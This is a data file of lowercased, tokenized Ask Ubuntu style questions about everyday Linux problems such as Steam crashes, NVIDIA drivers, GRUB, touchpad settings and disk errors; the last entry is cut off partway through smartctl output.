345109	kakaotalk with wine	i recently installed kakaotalk through wine . everything installed without a hitch , but the program can not run . an error dialog pops up with the message `` your system is not supported '' . does anyone know about running kakaotalk on linux ? using ubuntu 12.04
345110	13.04 root is read only	today i tried to reinstall ubuntu 13.04 and i found known bug , when i booted the os i only see dots all over the screen . i know how to fix this , i need to install nvidia-current from root but i have another problem . i tried to connect to internet using pppoeconf and i got error : file system is read only . so i can-t connect to internet to install nvidia drivers . please help me how to set file system so i get write to it .
345112	how to copy pwd onto clipboard ?	so i think many people have gone through this issue where you ssh into a machine , cd to whatever path you need to be at , and then realize you actually want to be root and not your own user . however , when you sudo su - , you sign in as root and get taken to root 's home directory . is there a way to copy the pwd before i run sudo su - and then cd to it after without typing it again ? something like cd - that is available across users .
345117	setxkbmap error : -option : command not found	i am trying to use setxkbmap to set the caps lock key to control using the command /usr/bin/setxkbmap -option `` ctrl : nocaps '' it was working for me , then i tried adding it to rc.local and .xinitrc to get running automatically on startup ... i never got that to work but i could manually run it with no problems . however now whenever i try to run it i get this error : > > > $ /usr/bin/setxkbmap -option `` ctrl : nocaps '' /usr/bin/setxkbmap : line 1 : -option : command not found i am thinking i may have messed up my setxkbmap script at some point because the file only contains one line with . -option `` ctrl : nocaps '' anyone know what the problem might be ? or is there a way to reset my setxkbmap files ? thanks
345120	why does n't steam start ?	when i try to start steam nothing happens . reinstall does n't help . $ steam running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 7278 with name 0eblobregistrymutex_dc7ebb4aea41d3c6c74e5effd6757cec removing stale semaphore last operated on by process 7278 with name 0eblobregistrysignal_dc7ebb4aea41d3c6c74e5effd6757cec removing stale semaphore last operated on by process 7278 with name 0emsteamengineinstance removing stale semaphore last operated on by process 7278 with name 0esteamenginelock gtk-message : failed to load module `` overlay-scrollbar '' installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) [ 0913/182910 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation how to fix it ?
345124	some websites do not load or load without css styles ( longtime problem )	i have a problem which i am unable to solve for about 2 years and its the reason i am not using ubuntu as much as i would like to . i am no networking expert so some user friendly or newbie answers would be great but any help would be appreciated ( i will google more info when i am pointed at right direction ) . this problem persists for me for a very long time , and i was experiencing it on my notebook and second computer too . i have no problem on a different operating system . the problem is only with ubuntu . i can not really say what is causing this but sometimes it just starts working and after few days its broken again ( in the last half of the year it worked just once ) . for example if i try to open youtube there are two possible scenarios that can occur besides that rare one which just loads the site as it should or as it is loading on different operating system . first one is that it has a very long load time and after that i get a blank page . the second more common scenario is that the page loads without css styles ( just plain html code ) . if the page loads without css as a plain html than the video is represented by a black rectangle representing the flash plugin . which works just fine except loading the video source . youtube is not that big of the deal for me . i can live without that on my ubuntu system but this problem happens with other sites too . this website or ubuntu forums included . there are many more bugged like this . basically like 2/3 or at least half of pages i want to load which is really frustrating and most of the time i just quit ubuntu and boot up other operating system . from the head right now i can think of imdb.com as an diferent example of this weirdness . right now this current site loaded fast but as a plain html without any styles . the last time it worked fine if i remember correctly was when i was using ubuntu 10.10 or something like that . right now i am at 12.10 64bit ( do n't really want to update it to 13.04 for now since last updating did not ended up very good and i ended up formmating the drive ) . basically i am unable to load most of the sites i want to load or they load incorrectly , . missing assets like stylesheets or javascript files . what i need is some help to correct this issue in some user friendly way since i dont have much experience with networking , or at least something that could guide me to the google solution . i was searching for a solution for a very long time during that years this was bugged for me and still i am unable to resolve this . if someone can help me or at least point me at some direction that would guide me to the solution , i would be really thankful to that person . if you need to know something specific than just ask . thanks for any help . ps : sorry for my bad english . update : editing this file : sudo gedit /etc/resolv.conf and changing this : nameserver 127.0.1.1 into this : nameserver 208.67.222.222 nameserver 208.67.220.220 helped untill rebooting the system ( when i changed it again it worked again ) , at least on the sites i was beeing able to try . i am not really sure what it does or if it is wise to edit it but for now its at least somewhat better than before . if this can bring some light to the problem and someone can find a propper solution that i would be able to follow , it would be just great . i will wait for it for a while and also to make sure it did not stop working like it did when it worked just by itself for some time . if not than i will mark it as solved and accept the answer . update2 : its a bit buggy but looks like it works . it never worked this long before . since i edited that file i am getting `` system program problem detected '' this error . never seen it before and it dont say anything specific ( just allows me to close it ) . but besides that and a fact that youtube loads without thumbnail images ( 404 error ) i did not notice anything else . its not ideal but i can live with that . i am going to mark it as solved . update3 : some time has passed , it still works but that `` system program problem detected '' error still persists . i 've created alias to change it and saved it inside ~/.bashrc as an link to the .bash_aliases . however i do n't even need to call it . it gets called automatically on the system start-up . i do n't like it like that but i can live with that . here is the alias if someone looks for that alias webfix= '' sudo sed -i 'nameserver 127.0.1.1 , nameserver 208.67.222.222d ' /etc/resolv.conf ''
345125	recover 12.04.3 lts - unable to mount /	message from ubuntu `` the disk drive for / is not ready or not present . the contents of the disk appear to be ok . i can mount it to another ubuntu session and view all of the files accessible to a user . the initial failure is related to a bad memory upgrade attempt . the timing was wrong and not allowing the system to boot . once the memory issue was corrected , ubuntu wo n't boot with the message above . using the recovery option eventually brings the same message but on a black screen instead of the usual purple ubuntu screen . is there an installation process that can repair the existing installation rather than replacing it ?
345126	installed/removed gnome , but now my boot/shutdown screens are showing the gnome desktop image instead of the default loading stuff	i recently installed gnome-shell and ubuntu-gnome-desktop , but was n't happy with gnome & decided to switch back to unity . i 've got a small issue though : something changed with the ubuntu boot/shutdown screens . instead of the traditional screen ( with the logo , dark bg , and loading `` dots '' ) , what i get first is a plain blue screen , no text or anything : that blue screen stays up for about 20s or so , and then it changes and shows this image for another 10s or so : ( pretty sure this is the default gnome background image actually , vertical stripes with varying shades/fades of blue ... ) and after that , it goes black for a second and then unity greeter loads , and everything else is fine from there . i 've already uninstalled/purged gnome-shell , and also i 've ran sudo update-initramfs -u & & sudo update-grub . any ideas as to how i can get the default ubuntu loading/shutdown screens back ? thanks ! edit : using ubuntu 13.04 , and i 've also tried running dconf-tools reset -f /org/compiz/ , with no change .
345129	how to make kde homerun opaque ?	i have recently had some issues with the ordinary kde application launcher ( it froze my plasma for a while ... ) , so i decided to give homerun a try . homerun seems really good at first glance , but how can i make the background opaque or at least less transparent ? currently the transparency seems to be ~50 % which makes it difficult to read anything from it . i am running raring kubuntu with kde 4.11.1
345131	ubuntu touch music file types	what kind of audio file types can the ubuntu touch play ? i want to push some of my music over , but want to make sure it works first . can it play .mp3 file types or would i be best converting them to .ogg ? thank you for your time and answers .
345132	should i disable avahi-daemon ?	every time i connect my computer to the network , i get a long list of network printers which i can not use . in this page ( see comments ) , someone suggested disabling avahi-daemon . i would do it if i knew what the consequences of this on my system . is it safe to disable this network service and what are the consequences of doing this ?
345139	how do i access a sandisk sd card ? getting error msgs upon insertion	i have a sandisk micro card from a cell phone that is n't being recognized when i plug it into the built-in reader on my laptop running ubuntu 12.04 lts i issued tail -f /var/log/syslog and inserted the card and the following messages were spit out : mmcblk0 : error -84 transferring data , sector 7 , nr 1 , cmd response 0x900 , card status 0x0 end_request : i/o error , dev mmcblk0 , sector 7 so ... any ideas about what 's wrong ?
345141	ubuntu 12.04 server : new kernels never used	i have three servers , all running ubuntu server 12.04 lts . when installed , the kernel is given a relatively small partition of around 227mb . when new kernels are released , they are installed , and grub appears to update , but when the machine is rebooted the old kernel is still used . the end result is that the kernel partition fills up with unused kernel versions , and i end up running out of space on the partition . i 've tried a range of things to try to get the servers to boot with the newest kernel , but with no luck . any ideas what i 'm doing wrong ? one possibility is some sort of confusion between grub 1 and grub 2 , as i have both grub.cfg and menu.lst files .
345145	my hard disc or pndrive is detected by ubuntu but it is not appearing on the computer	my hard disc or pendrive is detected by ubuntu but it is not showing on my screen . in terminal , i just typed dmesg after inserting my hard disc into and it is showing very verbose thing in which it is mentioning my external hard disc and its memory as well . i guess it detects my external device but it is not appearing . can i access my external device on screen by any possible way ? i am using ubuntu 12.04 64-bit . i ran the command sudo fdisk -l and it is giving me the output : omitting empty partition ( 5 ) disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x309fd85a device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 210434047 104857600 7 hpfs/ntfs/exfat /dev/sda3 210436094 936773631 363168769 f w95 ext 'd ( lba ) /dev/sda4 936773632 976769023 19997696 7 hpfs/ntfs/exfat /dev/sda5 294324224 615548927 160612352 7 hpfs/ntfs/exfat /dev/sda6 615550976 721735679 53092352 7 hpfs/ntfs/exfat /dev/sda7 721737728 936773631 107517952 7 hpfs/ntfs/exfat disk /dev/sdc : 7818 mb , 7818182656 bytes 76 heads , 12 sectors/track , 16743 cylinders , total 15269888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 8064 15269887 7630912 b w95 fat32 disk /dev/sdd : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf7ad36ed device boot start end blocks id system /dev/sdd1 * 64 976768064 488384000+ 7 hpfs/ntfs/exfat what should i do ? edit : i had tried what @ alaa mentioned in his answer , but i am still not able to get the complete solution . i typed the commands and added the same two lines then finally i got : naveenk @ ubuntu : ~ $ sudo mount -a '' mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . '' but when i added the two lines with replacing sdc with sda i got : naveenk @ ubuntu : ~ $ sudo mount -a mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . i had tried sdc by sda as my disc drive was detected in sda as i ran the commands suggested by krowe . i am a beginner in ubuntu so i am not able to fix it anyway .
345146	steam stopped running	5h ago steam was running well , but now there 's an error occuring when i try to launch steam : [ 0913/173803 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation i have my system upgraded . any ideas ?
345147	steam wo n't start,	steam was running fine for a few months , but recently it did n't start up , so i tried re-installing it and it still does n't start ! is it my pid and how do i check if my pid is running ?
345153	xfce taskbar does not load after installing nvidia drivers	i installed xubuntu to replace windows ( or at least use it as main os ) since most of the games i play are on steam now anyway . since the xorg drivers are not suited for gaming i installed the nvidia propriety drivers . the drivers are working fine , but the xfce taskbar does not load . i receive this message ( http : //i.stack.imgur.com/dnfa0.png ) followed by a text based login which appears for 2 seconds when booting into xubuntu before the ui loads . is that normal when you have installed nvidia drivers ? here is a comparison of how it looks with xorg drivers compared to nvidia drivers : i am using a gtx 560ti graphics card .
345155	dual boot problem with ubuntu and windows 7	i installed ubuntu 12.04.3 on a windows 7 machine . i selected to install it with windows 7 as a dual boot . ubuntu installed correctly but when i boot the machine it always boots ubuntu so i do not get the option to select windows . how do i fix this ?
345156	hindi typing tutor	i have been trying to learn hindi typing which uses devnagri script . do we know if there are any typing tutors for hindi language ( देवनागरी लिपि ) ? the standard official script adopted by indian govt . for administrative purposes is 'inscript ' . there are different varients of hindi keyboard layout . what i am specifically looking for is `` inscript '' layout .
345159	how do i make ms excel macros work in ubuntu ?	i have a spreadsheet writting in ms excel , an .xls document , which contains macros . i 'm having a problem finding a program what will allow me to open the document and the macros work . i tried opening the document in libreoffice and the macros wo n't work even though i went to tools - > options - > load/save - > vba properties - > and made sure load basic code and executable code were both checked . i even went to tools - > options - > security - > macro security - > and set it to low . i converted the .xls document to a libreoffice document and libreoffice still wo n't run the macros . i tried gnumeric . some of the macros seemed to work in gnumeric but most of them did n't . i installed calligra and tried opening it with sheets , but calligra just freezes and i have to force quit out of it . i do not have windows , i do not own ms office and have no means or desire to buy either one . so , what other options are there left for me ? i have been searching around google/bing but have n't found a solution yet . any thoughts or ideas ? i 'm running xubuntu 12.04 64-bit . thank you .
345161	ubuntu 13.04 very bad graphics error	i have a bad graphics error in my ubuntu 13.04 virtual machine ... this is how it looks . file : ///home/sam/desktop/capture.png everything is messed up ! here is an image when i open the ubuntu dash screen ( start menu , whatever ) file : ///home/sam/desktop/capt1ure.png sometimes it flickers . i actually `` struggled '' to click stuff , based on the locations of icons in the last versions of ubuntu ( that worked ) . note : i have tried turning off 3d graphics settings which works but it causes it to be laggy .
345166	when i try to change the brightness the laptop briks	hi i have this problem when i try to change the brightness of my laptop using fn key it quits x and shows me some log file in the terminal . i 'm using ubuntu 12.04.03 32bit lts on fujitsu/siemens amio pi 2530 whit intel core 2 duo cpu t5250 1.50ghz x2 . it have 1 gb ram and 250gb hdd . this is a fresh install and the laptop is running only ubuntu .
345172	no startup selection screen for option to run from dvd or usb stick	how do i get the startup selection screen prompt to run from a dvd or usb stick ? my computer ( s ) see the dvd or usb stick and i can boot , but it just goes right into graphical install mode & then i lose video . i can only get an alternate install image to work at all . i have tried multiple versions of ubuntu ( 11.x , 12.x , & now 13.x ) on multiple pcs ( although they are older systems running windows xp or vista ) . brian
345174	ubuntu wo n't boot : only grub terminal shows up	i have a problem with ubuntu 13.04 . a message saying `` /boot partition full '' popped out , and i found a solution to remove linux images . after that , when i restarted i got the message `` kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) '' and i googled for a solution and found one here kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) now , after i tried solutions from the link i can not boot at all , only the grub terminal shows up . any solutions beside new system installation ? i have some important files on my computer : /
345175	why is my ubuntu touch app not visible in the ubuntu software center ?	i submitted a ubuntu touch app packaged as a click package to the click app store and it was published a few days ago . it is not in my ubuntu software center , or in the online version . i tried a lot of searching , but it did not show up . should i resubmit my app ? what should i do ?
345177	how can i change the contents of grub loader ?	i have ubuntu 13.04 installed alongside of windows7 and in bootloader ( grub ) these operating systems as all of yours are with long names ! how i can change the names in grub ? for example i want to change the 4th one to `` my fathers os '' and when i choose it in the grub it will go to the windows
345179	is there an application that allows me to view markdown files ?	i do n't want a wysiwyg markdown editor . i would n't mind if the app allows me to edit the file , as long as it renders it separately . i know that markdown is easy to read without rendering it but i often want to check to make sure my document looks right before uploading it to github , so it would be nice to have an app to view markdown documents .
345181	websql and other databases not working with html5 apps	i am trying to develop an app for ubuntu touch using html5 and i need to create a database to store , well , everything in it . but qtwebkit supports neither websql nor indexeddb . is there any workaround to make the app support databases without anything beyond javascript ?
345183	configuration options while `apt-get install`ing	is there a way to set configuration options for packages or makefiles being run while apt-get is installing software ? i 'm currently installing freetds-dev by running apt-get install freetds-dev tdsodbc for the freetds-dev package i 'd like to set the -- with-open-ssl=open_ssl_dir option during the configuration step . it seems like common enough of a need that the standard install tools would provide hooks for it ... but it does n't look like it from the man pages and google . am i stuck writing the full install/uninstall script manually rather than just sudo apt-get ? or is there a way around it ?
345186	confused about paritioning in ubuntu	i am completely new to linux and ubuntu . i have installed ubuntu 13.04 using the `` something else '' option . my hdd was new , so i created the partitions as follows , in sda : partition 1 : mount point = / ; type = primary ; size = x ; format type = ext4 partition 2 : mount point = /home ; type = primary ; size = x ; format type = ext4 partition 3 : mount point = /usr ; type = primary ; size = x ; format type = ext4 partition 4 ( swap ) : type = primary ; size = x ( my ram size ) i expected that i should see 3 different partitions ( excluding swap ) in my computer , as i see in my windows 7 . however , there is nothing like that . whenever i enter the `` files '' section , i only see my home , documents , downloads etc . but not the other partitions i created to use . would you please explain it ? is n't it possible to create separate partition as i am expecting ?
345189	please settle a sticky ( bit ) argument	i got into a good-natured spat with a fellow worker about the nature of the sticky bit . my contention , working from the chmod man page was the the sticky bit , if set , allows only the owner to delete or rename files : restricted deletion flag or sticky bit the restricted deletion flag or sticky bit is a single bit , whose interpretation depends on the file type . for directories , it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory ; this is called the restricted deletion flag for the directory , and is commonly found on world-writable directories like /tmp . for regular files on some older systems , the bit saves the program 's text image on the swap device so it will load more quickly when run ; this is called the sticky bit . ( see also : http : //en.wikipedia.org/wiki/sticky_bit ) my colleague is adamant that the authoritative answer is an article on a yale forum from 1996 that instructs how the sticky bit is used to set the group inherited rights for the directory . ( http : //www.library.yale.edu/wsg/docs/permissions/sgid.htm ) accordingly , i have installed setafcl and set acl as an option on mount ( as detailed here : http : //superuser.com/questions/264383/set-file-permissions-so-that-new-files-inherit-same-permissions . would anyone like to help settle this dispute ... i believe i could drag a milkshake out of the guy if i am right . blake
345191	is it possible to burn to multiple cds at once ( with a gui ) ?	i have a minor dilemma , in that i need to be able to burn multiple cds at once , but with a gui . i have run into solutions using cdrao ( did i get that right ) and scripts , but as i 'm not the only one who will be responsible for burning ( i am not teaching a child to use the command line in 5 minutes , : ) , i need a gui solution . turbojet2 is one of the potential solutions i came across , but its last release was in 2007 ... so i 'm a bit wary to try it on my system ( currently dual booting between 13.10 and elementary os ) ( not that it will damage my system , but just that it likely wo n't work or even compile ) . i also read that it has some problems with speed , which is a big deal ( fastest speed possible is a necessity when you have to serve several people within a few hours , if that long ) . would it be possible to use k3b or brasero or xfburn , or xcdroast , etc to burn multiple cds at once ? when i attempted it with brasero and k3b at the same time , one of the cds gets ejected each time . my setup is as follows : a laptop with a built in optical drive . an external optical drive that talks to the laptop via usb . k3b detects them separately ; brasero ... well you know how it is with gnome . it does n't really seem to be able to tell the difference between two separate drives . however , i see no option to burn to each separately .
345199	nvidia driver fails after update on 12.04 using lenovo w520 laptop w/ quadro 1000m display driver	im new to ubuntu and i am excited to start using it . i have been using it for a day now and am noticing that the os is hanging a lot . i think this may be due to my display driver not being installed as i am just using the intel integrated display driver ... my dled the 64bit 12.04 release and my computer specs are : 16mb ram i7 processor nvidia 1000m display any tips on what i can do ? when i install the updates for the nvidia driver through ubuntu , and reset my computer , i end up at a black screen with a blinking cursor that goes nowhere . i had to uninstall the drivers before being able to get back into ubuntu . this was fine for a day but now i am realizing how slow everything is . everything is hanging when clicked . is the hanging because of the display driver ? is it because i missed something when i set up the installation ? thanks for the help . -pwneth
345200	command to map network share folder	i have a ubuntu server as my file server . i then have other pc 's and laptops on the same network . my server has ssh but default ssh port was changed to ( 2345 ) my question is what is the command that i have to type type in command line to get it mapped instead of using the gui application that comes with ubuntu . ubuntu laptop name : mylaptop my ubuntu server name : : servername ip address : 192.168.1.103 port number i 'm using : 2345 ( not default 22 ) folder share : /data thanks any help would be great .
345202	custom touchpad settings in /etc/x11/xorg.conf.d/ not being applied ( 13.04/raring ringtail )	i am attempting to customise my touchpad configuration using the synaptics options to xorg . however , after booting , my touchpad is still using the default settings . my current theory is that ubuntu 's gui mouse/touchpad configuration tool is overwriting my synaptics options , but i 'm not sure how to stop it doing that . i created a new directory , /etc/x11/xorg.conf.d/ , per the instructions in the comments of /usr/share/x11/xorg.conf.d/50-synaptics.conf , and another 50-synaptics.conf file in that directory . file contains : # custom touchpad settings by misha , 2013-09-13 # additional options may be added in the form of # option `` optionname '' `` value '' # section `` inputclass '' identifier `` touchpad mishagale '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' # this option should be obselete , and has minor security risks . option `` shmconfig '' `` on '' option `` touchpadoff '' `` 0 '' # turn the touchpad on # enable right-click emulation when pressing clickpad at # bottom-right corner option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' option `` vertedgescroll '' `` 1 '' option `` horizedgescroll '' `` 1 '' option `` verttwofingerscroll '' `` 1 '' option `` horiztwofingerscroll '' `` 1 '' option `` cornercoasting '' `` 1 '' option `` pressuremotionminz '' `` 30 '' option `` pressuremotionmaxz '' `` 80 '' # invert vertical axis - scrolling down on touchpad scrolls down # on the screen option `` vertscrolldelta '' `` 70 '' option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 3 '' option `` tapbutton3 '' `` 2 '' option `` clickfinger1 '' `` 1 '' option `` clickfinger2 '' `` 1 '' option `` clickfinger3 '' `` 1 '' option `` palmdetect '' `` 1 '' endsection however , after a reboot , running synclient gives this output , showing that several of the options i set ( e.g . vertscrolldelta , vertedgescroll , tapbutton3 ) have either not been applied , or some other process has reverted them : parameter settings : leftedge = 118 rightedge = 2842 topedge = 103 bottomedge = 1821 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 155 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = -70 horizscrolldelta = -70 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 1 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0566572 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 282 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 1 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 1 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 80 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 17 verthysteresis = 17 clickpad = 1 rightbuttonarealeft = 1480 rightbuttonarearight = 0 rightbuttonareatop = 1577 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 and here is a snippet from the xorg.0.log , which seems to show the settings in my /etc being correctly applied : [ 6.475 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/event10 ) [ 6.475 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` evdev touchpad catchall '' [ 6.475 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` touchpad catchall '' [ 6.475 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` default clickpad buttons '' [ 6.475 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` touchpad mishagale '' [ 6.475 ] ( ii ) loadmodule : `` synaptics '' [ 6.475 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 6.476 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 6.476 ] compiled for 1.13.1.901 , module version = 1.6.2 [ 6.476 ] module class : x.org xinput driver [ 6.476 ] abi class : x.org xinput driver , version 18.0 [ 6.476 ] ( ii ) using input driver 'synaptics ' for 'etps/2 elantech touchpad' [ 6.476 ] ( ** ) etps/2 elantech touchpad : always reports core events [ 6.476 ] ( ** ) option `` device '' `` /dev/input/event10 '' [ 6.484 ] ( ii ) synaptics : etps/2 elantech touchpad : found clickpad property [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : x-axis range 0 - 2960 [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : y-axis range 0 - 1924 [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : pressure range 0 - 255 [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : finger width range 0 - 15 [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : buttons : left double triple [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : vendor 0x2 product 0xe [ 6.484 ] ( ** ) option `` shmconfig '' `` on '' [ 6.484 ] ( ** ) option `` vertscrolldelta '' `` 70 '' [ 6.484 ] ( ** ) option `` vertedgescroll '' `` 1 '' [ 6.484 ] ( ** ) option `` horizedgescroll '' `` 1 '' [ 6.484 ] ( ** ) option `` cornercoasting '' `` 1 '' [ 6.484 ] ( ** ) option `` verttwofingerscroll '' `` 1 '' [ 6.484 ] ( ** ) option `` horiztwofingerscroll '' `` 1 '' [ 6.484 ] ( ** ) option `` touchpadoff '' `` 0 '' [ 6.484 ] ( ** ) option `` tapbutton1 '' `` 1 '' [ 6.484 ] ( ** ) option `` tapbutton2 '' `` 3 '' [ 6.484 ] ( ** ) option `` tapbutton3 '' `` 2 '' [ 6.484 ] ( ** ) option `` clickfinger1 '' `` 1 '' [ 6.484 ] ( ** ) option `` clickfinger2 '' `` 1 '' [ 6.484 ] ( ** ) option `` clickfinger3 '' `` 1 '' [ 6.484 ] ( ** ) option `` palmdetect '' `` 1 '' [ 6.484 ] ( ** ) option `` pressuremotionminz '' `` 30 '' [ 6.484 ] ( ** ) option `` pressuremotionmaxz '' `` 80 '' [ 6.484 ] ( ** ) option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' [ 6.484 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 6.484 ] ( ** ) etps/2 elantech touchpad : always reports core events [ 6.484 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio2/input/input10/event10 '' [ 6.484 ] ( ii ) xinput : adding extended input device `` etps/2 elantech touchpad '' ( type : touchpad , id 14 ) [ 6.484 ] ( ** ) synaptics : etps/2 elantech touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 6.484 ] ( ** ) synaptics : etps/2 elantech touchpad : maxspeed is now 1.75 [ 6.484 ] ( ** ) synaptics : etps/2 elantech touchpad : accelfactor is now 0.057 [ 6.485 ] ( ** ) etps/2 elantech touchpad : ( accel ) keeping acceleration scheme 1 [ 6.485 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration profile 1 [ 6.485 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration factor : 2.000 [ 6.485 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration threshold : 4 [ 6.485 ] ( -- ) synaptics : etps/2 elantech touchpad : touchpad found [ 6.485 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/mouse2 ) [ 6.485 ] ( ** ) etps/2 elantech touchpad : ignoring device from inputclass `` touchpad ignore duplicates ''
345204	hdd sector error , rebooted and ca n't boot again ( ubuntu-based linuxmint )	i rebooted my computer and then was unable to get it to start back up . it now drops to busybox after an hour of waiting on the boot process . i booted into a ubuntu12.04.3 livecd and tried to mount the partition , but no luck - except it said : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda6 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so i tried that in terminal and got : ubuntu @ ubuntu : ~ $ dmesg | tail [ 861.434200 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 861.434226 ] 0c 7d 48 a0 [ 861.434238 ] sd 0:0:0:0 : [ sda ] [ 861.434247 ] add . sense : unrecovered read error - auto reallocate failed [ 861.434255 ] sd 0:0:0:0 : [ sda ] cdb : [ 861.434260 ] read ( 10 ) : 28 00 0c 7d 48 a0 00 00 38 00 [ 861.434285 ] end_request : i/o error , dev sda , sector 209537184 [ 861.434328 ] ata1 : eh complete [ 861.434460 ] jbd : recovery failed [ 861.434477 ] ext3-fs ( sda6 ) : error loading journal ubuntu @ ubuntu : ~ $ i am writing this from the same computer and hard-drive , but a different partition which has windows on it and can boot . i 'd just use the livecd ( on usb ) ubuntu , but it takes 10mins to boot up , and does n't have wifi drivers for my machine . what should i do ? edit : i ran sudo smartctl -a smartctl 5.43 2012-06-05 r3561 [ i686-linux-3.2.0-4-486 ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === device model : toshiba mk1637gsx serial number : 875dt0o4t firmware version : dl040d user capacity : 160,041,885,696 bytes [ 160 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 7 ata standard is : exact ata specification draft version not indicated local time is : tue sep 17 09:46:56 2013 utc smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 92 ) minutes . sct capabilities : ( 0x0001 ) sct status supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0004 100 100 000 old_age offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 1673 4 start_stop_count 0x0032 100 100 000 old_age always - 2351 5 reallocated_sector_ct 0x0033 100 100 050 pre-fail always - 3 7 seek_error_rate 0x000a 100 100 000 old_age always - 0 8 seek_time_performance 0x0004 100 100 000 old_age offline - 0 9 power_on_hours 0x0032 042 042 000 old_age always - 23519 10 spin_retry_count 0x0032 146 100 000 